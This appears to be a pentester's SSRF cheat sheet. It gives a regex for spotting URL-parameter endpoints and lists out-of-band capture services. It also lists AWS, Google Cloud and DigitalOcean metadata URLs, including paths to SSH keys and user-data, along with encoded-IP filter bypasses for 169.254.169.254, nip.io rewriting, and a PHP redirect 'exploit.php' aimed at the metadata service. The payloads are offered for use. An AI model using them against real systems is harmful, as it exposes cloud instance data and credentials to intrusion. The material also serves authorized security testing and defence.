Server Side Request Forgery (SSRF)

This page contains my tips and tricks for SSRF exploitation.

Detecting Endpoints

To facilitate the automated identification of endpoints that may be vulnerable, I typically employ regular expressions (regex) in my approach.

(\?|\&)([^=]+)\=https?:\/\/([^&]+)

The regex above detects endpoint with URL parameters.

Capturing Requests

To effectively capture the requests initiated by Server-Side Request Forgery (SSRF), the following methods are my preferred choices:

• http://webhook.site/

• https://app.interactsh.com/

• BurpSuite Collabrator

Juicy Endpoints for Cloud

AWS
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/dynamic/instance-identity/document

GCloud
http://169.254.169.254/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/
http://metadata/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/hostname
http://metadata.google.internal/computeMetadata/v1/instance/id
http://metadata.google.internal/computeMetadata/v1/project/project-id

Digital Ocean
http://169.254.169.254/metadata/v1.json
http://169.254.169.254/metadata/v1/ 
http://169.254.169.254/metadata/v1/id
http://169.254.169.254/metadata/v1/user-data
http://169.254.169.254/metadata/v1/hostname
http://169.254.169.254/metadata/v1/region
http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address

Common Bypass Techniques

Given that the majority of web applications employ various whitelist and/or blacklist protection mechanisms, it is often necessary to navigate through multiple security layers to achieve successful exploitation. The following methods are my preffered choices:

URL Rewrite

nip.io 

nip.io allows you to do that by mapping any IP Address to a hostname 
using the following formats:

10.0.0.1.nip.io maps to 10.0.0.1
192-168-1-250.nip.io maps to 192.168.1.250
0a000803.nip.io maps to 10.0.8.3

URL format bypasses

http://425.510.425.510 Dotted decimal with overflow
http://2852039166 Dotless decimal
http://7147006462 Dotless decimal with overflow
http://0xA9.0xFE.0xA9.0xFE Dotted hexadecimal
http://0xA9FEA9FE Dotless hexadecimal
http://0x41414141A9FEA9FE Dotless hexadecimal with overflow
http://0251.0376.0251.0376 Dotted octal
http://0251.00376.000251.0000376 Dotted octal with padding
http://0251.254.169.254 Mixed encoding (dotted octal + dotted decimal)
http://[::ffff:a9fe:a9fe] IPV6 Compressed
http://[0:0:0:0:0:ffff:a9fe:a9fe] IPV6 Expanded
http://[0:0:0:0:0:ffff:169.254.169.254] IPV6/IPV4
http://[fd00:ec2::254] IPV6

Secondary exploitation with a simple PHP web server.

exploit.php
<?php
header("Location: http://169.254.169.254/latest/meta-data/");
?>

Automating SSRF Discovery

Given that Burp Suite enables the utilization of regular expressions in its match and replace rules, devising an automated process for the detection of Server-Side Request Forgery (SSRF) becomes a relatively straightforward task.

https?:\/\/[\w\-\.]+(\.[a-z]{2,})+\/?

Regular expression for detecting URLS.